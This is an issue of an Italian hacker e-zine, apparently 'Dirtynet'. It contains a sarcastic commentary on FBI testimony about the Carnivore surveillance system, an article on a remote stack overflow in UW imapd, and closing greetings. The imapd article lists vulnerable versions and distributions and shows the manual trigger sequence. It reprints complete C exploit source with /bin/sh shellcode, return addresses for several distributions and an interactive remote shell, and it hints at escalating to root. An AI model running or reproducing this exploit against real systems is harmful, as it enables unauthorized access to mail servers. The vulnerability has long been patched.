*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ Le presenti informazioni sono facilmente recuperabili in Rete, anche sul sito dell'FBI. Quindi su questo articolo non saranno dette cose sconosciute totalmente, ma verranno solo trattate argomentazioni sconosciute ai più. */*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ Siamo davvero soli ? Il 6 settembre 2000 questa domanda ha avuto una risposta. La risposta è NO. Il 6 settembre 2000 il signor Donald M. Kerr presentava al senato degli Stati Uniti d'America (USA) il programma Carnivore. Con questa data anche la più piccola speranza di anonimimato in Rete è sparita. Tra virgolette ( " " ) saranno riportati passi del discorso pronunciato il 6 settembre. E voi credevate che con Echelon finisse tutto.. */*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ "Buongiorno , Mr Chairman e membri del comitato. Vi sono grato per l'oppportunità di poter parlare di Carnivor - un sistema designato specificamente per forzare la privacy e allo stesso tempo rispettare la legge. Carnivore è un sistema che contiamo possa venirci in aiuto nei casi critici di combattimento al terrorismo, allo spionaggio, alla guerra d'informazioni, all'hacking ed altri crimini violenti che usano Internet, per difendere la nostra Nazione e la nostra gente. Nel mio discorso toccherò principalmente 5 punti: 1.- Perchè abbiamo bisogno di un sistema come Carnivore 2.- Perchè il publico deve essere a conoscenza del fatto che Carnivore esista 3.- Come lavora Carnivore 4.- Perchè gli ISP non devono avere timore dell'uso di Carnivore 5.- Perchè il pubblico deve essere fiducioso che l'uso di Carnivore non lederà la loro privacy" Credo che abbiate capito che cosa sia a grandi linee Carnivore. Un programma che una volta installato dai provider su richiesta (richiesta o obbligo ?) del FBI è in grado d'intercettare qualsiasi comunicazione. In questi anni l'FBI è andata incontro a un largo numero di criminali che usavano Internet per comunicare tra di loro o per comunicare con le loro vittime. Spesso però i provider di appartenenza di questi criminali non hanno gli strumenti necessari per intervenire salvaguardando la privacy degli altri utenti. In parole povere possono controllare le e-mail, ma devono controllarle tutte, non hanno gli strumenti necessari per bloccare quelle che vengono da un determinato utente o da un determinato abbonamento. Proprio per venire incontro a questi provider il laboratorio dell'FBI ha creato Carnivore. Carnivore, ascoltando la definizione che ha l'FBI, ha una capacità "chirurgica" di intercettare e loggare particolari comunicazioni che infrangono la legge, lasciando stare le altre, evitando così intercettazioni non autorizzate. Carnivore lavora come molti degli "sniffer" in circolazione e altri tool usati dagli ISP tutti giorni con la differenza però che ha la straordinaria capacità di distinguere tra comunicazioni che possono essere legalmente intercettate e quelle che non possono esserlo. Ad esempio può (opportunamente configurato) intercettare solo un tipo di comunicazione (e-mail ad esempio) ed escludere le altre (es. shopping online) oppure può essere configurato per controllare solo le email che provengono o che vengono indirizzate a un particolare indirizzo. "1.- Perchè l'FBI ha bisogno di Carnivore ? E' cosa risaputo che terroristi, spie, hacker [ma ci mettono sullo stesso piano ?] e altri pericolosi criminali usano sempre di più il computer e le reti, inclusa Internet, per portare a termine i loro piani criminali. Carnivore è la nostra risposta , per salvaguardare la nostra Nazione, la popolazione americana [gli europei no, puzziamo troppo.. :)) ], la sicurezza delle nostre comunicazioni e la sicurezza dei privati e per una Internet più sana e sicura. Per questo l'FBI concentra le sue forze, compresa la ricerca tecnologica, per combattere questi cyber criminali" Faccio notare tutti la continua presenza della parola criminali associata a Internet.. "2.- Perchè il publico deve essere a conoscenza del fatto che Carnivore esista" Vi risparmio tutto il discorso, in quanto infarcito di riferimenti a leggi varie. Il discorso più che altro è legato al fatto che nonostante ci siano delle leggi in materia di Privacy anche in Internet, loro sono autorizzati a non rispettarle, se questo è utile alla protezione della sicurezza. Il pubblico và informato del fatto che Carnivore esiste perchè così tutti sappiamo che possono farci il culo quando e come vogliono e che lo fanno in maniera completamente legale.. Bello, no ? "3.- Come lavora Carnivore e perchè l'FBI crede che sia più attendibile, preciso e tecnologicamente superiore degli sniffer commerciali ? Carnivore è veramente un tool studiato per le intercettazioni telematiche. Il programma è un filtro che l'FBI ha sviluppato con cura, precisione e rispettando la legge. In particolare, il programma permette all'FBI, con la compiacenza della costituzione federale, le intercettazione telematiche di tutte le comunicazioni permettendo agli investigatori di acquisire il maggior numero di informazioni possibili sul bersaglio. Carnivore è superiore a qualsiasi "sniffer" esistente in commercio che gli ISP usano ogni giorno sul loro network. La concezione di intercettazioni con gli altri sniffer è molto chiusa e con essi viene infranta ogni possibile legge sulla privacy. Non sono stati creati per le intercettazioni. E' importante descrivere quando e come Carnivore lavora. E' importante spiegare cosa il programma mostra e, più importante, cosa non mostra agli agenti dell'FBI che lo usano. Prima di tutto, Carnivore verrà usato solo quando l'FBI avrà il permesso della corte (o quando la legge lo consente) ad intercettare o ad acquisire informazioni sul criminale, come ad esempio il suo indirizzo, il suo numero account ec.. Secondo, quando un ISP può collaborare completamente con la corte [mostrare i log insomma] l'FBI non avrà la necessità di impiegare Carnivore. Terzo, l'uso del programma può essere fatto solo con la collaborazione dei tecnici dell'ISP e l'FBI non può usarlo senza la loro cooperazione. Quarto, una volta messo al lavoro Carnivore potrà analizzare solo il piccolo segmento di traffico del network che verrà usato dall'obbiettivo e dove le sue comunicazioni possono passare. Il programma non può avere accesso di tipo "Grande Fratello", cioè non può controllare tutto il traffico dell'ISP. [dobbiamo crederci ?]. Per illustrare le funzionalità di Carnivore è importante capire che Carnivore filtra solo le informazioni che gli servono. La sua prima operazione è filtrare una porzione della traffico dell'ISP. Lo filtra in codice binario, una serie di 0 e 1 che scorre attraverso la rete dell'ISP, per esempo, a 40 megabit al secondo, spesso a una velocità maggiore. Carnivore lavora in tempo reale con queste velocità. Per visualizzare meglio il concetto, provate a pensare a un enorme schermo che contiene 40 milioni di 0 e 1 che appaiono sullo schermo per 1 secondo e 1 secondo solo. La prima operazione di Carnivore sarà quella di identificare se e quali di quegli 0 e 1 appartengono al criminale e a quale tipo di comunicazione appartengono (infatti se hanno il permesso di intercettare solo le email, non possono intercettare l'FTP). Se trovato, il paccheto che contiene le informazione del soggetto in questione viene ulteriormente filtrato. E' importante comunque ricordare che quei 40 milioni di 0 e 1 che non centrano nulla on il criminale in questione non vengono in alcun modo salvati, essi si vaporizzano dopo 1 secondo. Puff, spariti, vaporizzati, non vengono collezionati, salvati o venduti. Il personale dell'FBI non vedrà mai nessuno di questi 40 milioni di 0 e 1. Se non ci sono informazioni del soggetto in questione in questo schermo si passerà allo schermo successivo che sarà trattato sempre con lo stesss sistema. A questo le informazioni del soggetto sotto controllo passeranno ad un altro filtro, che controllerà di che siano queste informazioni e solo se appartengono al tipo di comunicazione di cui si ha l'autorizzazione di intercettazione. Solo ora, dopo che è stato filtrato tutto, gli addetti dell'FBI vedranno il risultato. 4.- Perchè gli ISP non devono avere timore dell'uso di Carnivore Carnivore lavora solo su una piccola parte del server, ovvero la parte dove è possibile che passino i dati che riguardano il soggetto sotto osservazione (come già detto prima). Carnivore è collegato al server attraverso un ponte fisico che gli impedisce di trasmettere dati di qualsiasi tipo al resto del network, quindi non ha potere di trasmettere dati o qualsiasi altra cosa al netowrk. Ma Carnivore non è mai stato installato e non sarà mai installato senza l'autorizzazione del personale del personale del provider. Internet è una rete molto complicata e in continua evoluzione e le assicuro che senza le conoscenze tecniche del personale dell'ISP sarebbe molto difficile, e in alcuni casi davvero impossibile, controllare il soggetto. In più l'FBI non potrebbe lavorare senza le informazioni che danno i tecnici riguardo all'architettura e ai protocolli del server. Qualcuno ha mossa la critica che Carnivore aumenterebbe le possibilità di essere vittime di hacking. Ma sbagliano. Con rispetto per l'hacking e considerando le tecniche hacking più usate, non ci sono significativi aumenti di insicurezza nell'usare Carnivore. In più dato che Carnivore è uno strumento dell'FBI usarlo come punto di accesso per altri network sarebbe da pazzi per il rischio che si corre [effettivamente farla in barba all'FBI sarebbe come consegnarsi in prigione..] e in più come detto precedentemente Carnivore non ha accesso al resto del network [può solo ricevere dati, non risponde] In ultima c'è la faccenda che secondo un particolare ISP l'uso di Carnivore ha causato il crash del suo sistema e altri problemi nel network. Ma queste dichiarazioni sono sbagliate. Prima di tutto la causa dei problemi del network (non ci fù crash) era semplicemente di natura tecnica e quindi di esclusiva competenza dei tecnici del network. [bel modo di scaricare le colpe..] 5.- Perchè il pubblico deve essere fiducioso che l'uso di Carnivore non lederà la loro privacy Crediamo che il popolo americano abbia fiducia nell'FBI per la sua condotta del controllo elettronico, principalmente perchè hanno capito che noi lavoriamo nel rispetto della legge, dopo che il congresso emanò la 40 anni fà la prima legge sulla sorveglianza elettronica nel 1968. Molti dicono che i metodi dell'FBI sono illegali. E' sbagliato, non ci sono prove che lo dimostrino. Ogni azione è autorizzata da un tribunale e l'FBI non ha mai abusato del suo potere. Cominciamo col dire che tutte le investagazioni dell'FBI, ogni sorveglianza, ogni intercettazione, ogni perquisizione è autorizzata, monitorata e supervisionata per ogni passo dal locale studio legale e le corte legale o da un magistrato. Ogni nostra azione è controllata e approvata da chi di competenza in quel campo e in quello stato. Negli ultimi 30 anni le intercettazioni elettroniche dell'FBI sono state strettamente supervisionate dal dipartimento di giustizia e non ci sono mai stati absui. Anzi, il dipartimento di giustizia ha sempre indicato i nostri modelli come modelli di correttezza, cura e rispetto della legge nelle intercettazioni. A questo punto può essere utile parlare del personale che utilizzerà Carnivore. Cominciamo col dire che tutti gli impiegati dell'FBI sono persone che hanno dimostrato onestà, rispetto della legge, integrità personale. Tutto questo può essere dimostrato con la loro condotta che ha portato all'attuale sicurezza nazionale e al livello investigativo. Per essere sicuri la struttura dell'FBI fà crollare presto se gli agenti assunti si dimostrano non degni di fiducia o se non mantengono la riservatezza riguardo al loro impiego." 6 settembre 2000 - Donald M. Kerr Questo è un sunto del discorso di Kerr, naturalmente non è una traduzione completa di ogni singolo passo, ma ho estratto le parti più importanti. Spero comunque che questa lettura vi faccia capire che la possibilità di essere tracciati esiste sempre, non siete mai anonimi, posso sempre sapere chi siete. Qualke link per sapere di più ? www.fbi.gov --> Andate su Search e scrivete Carnivore.. Troverete molta roba http://www.fbi.gov/congress/congress00/kerr090600.htm http://www.fbi.gov/programs/carnivore/ */*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ Un saluto a tutti quelli del Tank Commandos, a Bismark.it [che mentre chiudo è chiuso x problemi con pedofilia], a quelli di Dirty Net, a quelli di irc.azzurra.it, agli U.TN. */*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\ /===========================::=============================::=================/ / /Imapd exploit / SPYRO / /===========================::=============================::=================/ -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- / - |--> /Disclaimer |--> /Info_su_Imapd_&_Exploit |--> /Versioni_vulnerabili |--> /Distribuzione_di_Linux_con_Demone_vulnerabile |--> /Testare_le_condizioni_x_attuare_exploit |--> /Impatto_dopo_funzionamento_exploit |--> /Correzione_exploit |--> /Codice_sorgente_exploit |--> /Ringraziamenti_e_Saluti -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- bash# cd /Disclaimer bash# cat disclaimer.txt Quello che riporterò qui di seguito,sarà la spiegazione di un'exploit che ha lo scopo di far ottenere l'accesso ad un server tramite esso. Al giorno d'oggi la rete pultroppo è piena di lamer,e io con questo testo non vorrei contribuire alla nascita di nuovi,qundi pensateci due volte prima di mettere in atto queste informazioni. Io ho scritto questo testo soltanto x mettere in evidenza i problemi di sicurezza riguardanti la rete. Quindi se farete danni a voi stessi o ad altre persone,NE IO,NE L'AUTORE DEL BUG,ci rendiamo responsabili! Tutto a scopo informativo! Siete RESPONSABILI delle vostre azioni. -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- bash# cd /Info_su_Imapd_&_Exploit bash# cat info.txt Imapad è il più popolare e famoso demone per mail service usato dagli ISP's di tutto il mondo. Sviluppato dalla Washington´s University,imapad è un programma usato con molti servizi di Webmail. Quindi è possibile usufruire del demone da remoto,precisamente sulla porta 143. Recentemente è stato trovato un'exploit da remoto basat su un metodi di Stack overflow,ovvero un'eccedenza di dati. Il programma riceve segnali SIGSEGV,e lo mandano in Segmentation fault,ovvero si impianta =) 0x41414141 in ?? () (gdb) Questo Bug è stato scoperto da uno specialista in sicurezza di nome Felipe Cerqueira, (fcerqueira@bufferoverflow.org),che ha scritto un remote exploit in C per questo demone. -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- bash# cd /Versioni_vulnerabili bash# cat vers.txt Non tutte le versioni di Imapad sono vulnerabili,e qui di seguito elencherò quelle che lo sono: -- IMAP4rev1 v12.261 -- IMAP4rev1 v12.264 -- IMAP4rev1 2000.284 Nota: L'exploit è stato testato solo sulle versioni di Imapad che ho elencato sopra,ciò non toglie il fatto che anche altre versioni siano buggate da questo remote exploit. -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- bash# cd /Distribuzione_di_Linux_con_Demone_vulnerabile bash# cat distro.txt Riporto un piccolo schema per capire quale distribuzione di linux,ha il demone buggato. ______________________________________________ | Distro. | Vulnerabile? | |-------------------------|--------------------| |Slackware 7.0 | SI | | | | |Suse Linux | ? | | | | |Corel Linux | ? | | | | |Conectiva Linux 6.0 | SI | | | | |Mandrake Linux | NO | | | | |RedHat 6.2 Zoot | SI | | | | |Debian Linux | ? | | | | |Slackware 7.0 | SI | ---------------------------------------------- -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- bash# cd /Testare_le_condizioni_x_attuare_exploit bash# cat test.txt Per mettere in atto questo exploit,prima dobbiamo fare delle prove alla linux box. Per farlo,basta seguire questo tipo di comandi: telnet> open 266.299.992.662 143 * OK localhost IMAP4rev1 v12.261 server ready 1 login felipe felipe 1 OK LOGIN completed 1 lsub "" {1064} + Ready for argument A*1064 -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- bash# cd /Impatto_dopo_funzionamento_exploit bash# cat impatto.txt Se l'exploit va a buon fine,ovvero funziona,cosa accade e cosa ci compare? Avverrà che avremo un'accesso da remoto senza permessi di root,ma con UID e GID di un'user auten ticato nell'imap server. Quindi per roottare la shell,andrebbe usato un'exploit da locale(da non fare). ;) -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- bash# cd /Correzione_exploit bash# cat correxp.txt Per correre ai ripari da questo exploit,non bisogna far altro che collegarsi su: ftp://ftp.cac.washington.edu/imap e scaricarsi la nuova versione di IMAP(IMAP200c - 2000.287) dove è stato corretto il problema. -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- bash# cd /Codice_sorgente_exploit bash# cat imapd.c -------------------------------------------Exploit----------------------------------------------- /* * !!! Private !!! * * imapd IMAP4rev1 v12.261, v12.264 and 2000.284 Remote Exploit. Others? Yes! * * By: SkyLaZarT ( fcerqueira@bufferoverflow.org ) .aka. Felipe Cerqueira * Homepage: www.BufferOverflow.Org * Thankz: cync, oldm and Jans. ( BufferOverflow.org Team ) * Antonio Marcelo and Felipe Saraiva * */ #include #include #include #include #include #include #include #include #include #include #define SIZE 1064 #define NOP 0x90 #define RET12261 0xbffff3ec #define RET12264 0xbffff4e0 #define RET12264ZOOT 0xbffff697 #define RET2000_284 0xbfffebc8 #define INIT(x) bzero(x, sizeof(x)) #define READ(sock,x) read(sock, x, sizeof(x)) #define TIMEOUT 20 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int debug = 0; void openshell(int sock, int check); void processSignal(int signum); void processSignal(int signum) { fprintf(stderr, "Time out!!\n"); exit(-1); } void openshell(int sock, int check) { char buffer[1024]; fd_set rset; int i; while(1) { FD_ZERO(&rset); FD_SET(sock, &rset); FD_SET(fileno(stdin), &rset); select(sock + 1, &rset, NULL, NULL, NULL); if (FD_ISSET(sock, &rset)) { if ((i = read(sock, buffer, sizeof(buffer))) <= 0) { fprintf(stderr, "Connection terminated!\n"); close(sock); exit(-1); } else { buffer[i] = 0x00; if(check) { if (!(strstr(buffer, "uid"))) { fprintf(stderr, "Exploit failed\n"); exit(-1); } else { fprintf(stderr, "Exploit Success!!\n"); check = 0; } } puts(buffer); } } if (FD_ISSET(fileno(stdin), &rset)) { if ( check ) write(sock, "id\n", 3); if ((i = read(fileno(stdin), buffer, sizeof(buffer))) > 0) { buffer[i] = 0x00; write(sock, buffer, i); } } } } int main(int argc, char **argv) { char buffer[SIZE], sockbuffer[2048]; char *login, *password; long retaddr; struct sockaddr_in sin; struct hostent *hePtr; int sock, i; fprintf(stderr, "\nRemote exploit for IMAP4rev1 v12.261, v12.264 and 2000.284\n" "Developed by SkyLaZarT - www.BufferOverflow.org\n\n"); if ( argc < 5 ) { fprintf(stderr, "%s [offset]\n", argv[0]); fprintf(stderr, "\ttype: [0]\tSlackware 7.0 with IMAP4rev1 v12.261\n" "\ttype: [1]\tSlackware 7.1 with IMAP4rev1 v12.264\n" "\ttype: [2]\tRedHat 6.2 ZooT with IMAP4rev1 v12.264\n" "\ttype: [3]\tSlackware 7.0 with IMAP4rev1 2000.284\n\n"); exit(-1); } login = argv[2]; password = argv[3]; switch(atoi(argv[4])) { case 0: retaddr = RET12261; break; case 1: retaddr = RET12264; break; case 2: retaddr = RET12264ZOOT; break; case 3: retaddr = RET2000_284; break; default: fprintf(stderr, "invalid type.. assuming default " "type 0\n"); retaddr = RET12261; break; } if ( argc == 6 ) retaddr += atoi(argv[5]); signal(SIGALRM, processSignal); fprintf(stderr, "Trying to exploit %s...\n", argv[1]); fprintf(stderr, "Using return address 0x%08lx. Shellcode size: %i bytes\n\n", retaddr, strlen(shellcode)); alarm(TIMEOUT); hePtr = gethostbyname(argv[1]); if (!hePtr) { fprintf(stderr, "Unknow hostname : %s\n", strerror(errno)); exit(-1); } alarm(0); sock = socket(AF_INET, SOCK_STREAM, 0); if ( sock < 0 ) { perror("socket()"); exit(-1); } sin.sin_family = AF_INET; sin.sin_port = htons(143); memcpy(&sin.sin_addr, hePtr->h_addr, hePtr->h_length); bzero(&(sin.sin_zero), 8); fprintf(stderr, "Connecting... "); alarm(TIMEOUT); if ( connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0 ) { fprintf(stderr, "failed to %s:143\n", argv[1]); exit(-1); } alarm(0); fprintf(stderr, "OK\n"); for ( i = 0; i <= SIZE; i += 4 ) *(long *)&buffer[i] = retaddr; for ( i = 0; i < ( SIZE - strlen(shellcode) - 100); i++ ) *(buffer+i) = NOP; memcpy(buffer + i, shellcode, strlen(shellcode)); INIT(sockbuffer); READ(sock, sockbuffer); if(debug) fprintf(stderr, "debug %s", sockbuffer); fprintf(stderr, "Trying to loging ... "); sprintf(sockbuffer, "1 LOGIN %s %s\n", login, password); write(sock, sockbuffer, strlen(sockbuffer)); INIT(sockbuffer); READ(sock, sockbuffer); if(debug) fprintf(stderr, "debug %s", sockbuffer); if (!(strstr(sockbuffer, "OK LOGIN completed"))) { fprintf(stderr, "Login failed!!\n"); close(sock); exit(-1); } fprintf(stderr, "OK\n"); INIT(sockbuffer); sprintf(sockbuffer, "1 LSUB \"\" {1064}\r\n"); write(sock, sockbuffer, strlen(sockbuffer)); INIT(sockbuffer); READ(sock, sockbuffer); if(debug) fprintf(stderr, "debug %s", sockbuffer); if(!(strstr(sockbuffer, "Ready"))) { fprintf(stderr, "LSUB command failed\n"); close(sock); exit(-1); } fprintf(stderr, "Sending shellcode... "); write(sock, buffer, 1064); write(sock, "\r\n", 2); fprintf(stderr, "OK\n"); fprintf(stderr, "PRESS ENTER for exploit status!!\n\n"); openshell(sock, 1); close(sock); return 0; } -------------------------------------------Exploit----------------------------------------------- --------------------------------------------INFORMAZIONE----------------------------------------- #include main(){ printf("Ho messo il sorgente originale\n"); printf("se qualcosa non vi funziona,non è di mia competenza\n"); } --------------------------------------------INFORMAZIONE----------------------------------------- -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- bash# cd /Ringraziamenti_e_Saluti bash# cat saluti.txt Ringraziamenti: Ringrazio particolarmente Antonio Marcelo,autore e scrittore dell'exploit,da cui ho preso lo spunto per scrivere questo testo. Antonio Marcelo Security Specialist Bufferoverflow.org -- BufferOverflow.Org Security Advisory -- -- Date: February/20/2001 -- A stack overflow in imapd Saluti: Bakunin(Mio grande maestro),AtlaWare,mR_bIs0n(Mio Fratellone),Spawn,BsTHaCk,Anubi,D4rkSt4r. Radion,Warning,Terror,Gouranga,Blender,Prodigy,Hiloz[83],Memorik,Hedo,MrWolf,Screen_it,zapotecz, Goony,Scire,Sulex,Floppino,Grungio,Fratak,McGiver,AntiS,gouranga,LizDay,satz,cancerman,Dea,ULCC, Ice'St0rm e tutti quelli che ho dimenticato di #phreak.it(scusatemi). Poi saluto anche tutti quelli dei tamkcommandos,della hrn,pbk,Maphias0ft,gli Spippolatori,in particolare il grande Master,Chrome, Brigante,RigorMortem,e tutti quelli che mi vogliono bene :) Fuck to: MMMMM un gran vaffanculo all'amicizia fra ragazzi e ragazze!!!!!! -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- bash# cat end.c #include main(){ printf("Anche per oggi è tutto dal vostro SPYRO\n"); printf("Ciaoooooooooooo\n"); } bash# halt ATTENDERE:ARRESTO DEL SISTEMA IN CORSO...... ORA SI PUO' SPEGNERE IL COMPUTER! ahahaha scherzo ;) /===========================::=============================::=================/ / /Outro / A[v]a[t]A[r] / /===========================::=============================::=================/ Ragazzi anche questo numero di Dn è finito ed ora non mi resta altro che salutarvi. Poi cerchero' di fare qualche altra cosa, molto difficile visto chè fuori piove e molti dei miei amici sono partiti per trascorrere le tante attese feste pasquali. Ringrazio syn che ha collaborato con me e tutti quelli che hanno letto Dirtynet fino in fondo. Non vi preoccupate per me sicuramente trovero' qualcosa da fare anzi lo sapete cosa vi dico ora mi vado a preparare un bel cubalibre e poi inizio a fare i rosari su Marilyn Manson!!! Questa non la ho detta io e stato syn...... Ringraziamenti e saluti Method man (frato di sYn) Avatar Giada Carminuccio Gollo Scafuto Scafuti Chip sKAM smav Immacolata Nicoli' Marilyn Manson Papa Roach all mumy Angelocattivo #buonavolonta Linux Armando Costantino Gigi D'Ag Gennaro Cherubbino Capucchion Pecuron (Agnello) Gei rasc' (Jrash) Leo il colombiano Zi' Pepp Capa Rezza ! Carletto Cristiano & l'animale Winning eleven ! Dj time Claudia Shiffer ! Frezzolino o bread camelot Tank commandos crew Fons' a patan' Perrotta prrrrrr Ivan il terribile ! Maradona Il berretto di Armando Il gsm di ava con sopra il logo di Hackersat.com ! Norma Vittoria la zoccola Nigeria Pinturicchio Babangida ! MinM Salernitana Il Cosentino Pantuliano la stronza fontanella syn's guitar Nello Rutelli Di Biase Scevcenko Batistuta SPYRO Spencer Bove prof.ssa di syn ! pagnotta Blinky NCKxxx Chiunque voglia collaborare , puo' sempre inviare i propi art a "syn@hackersat.com"; è chiaro saranno valutati prima. CMQ siete tutti ben accetti. Chi non ama troppo, non ama abbastanza.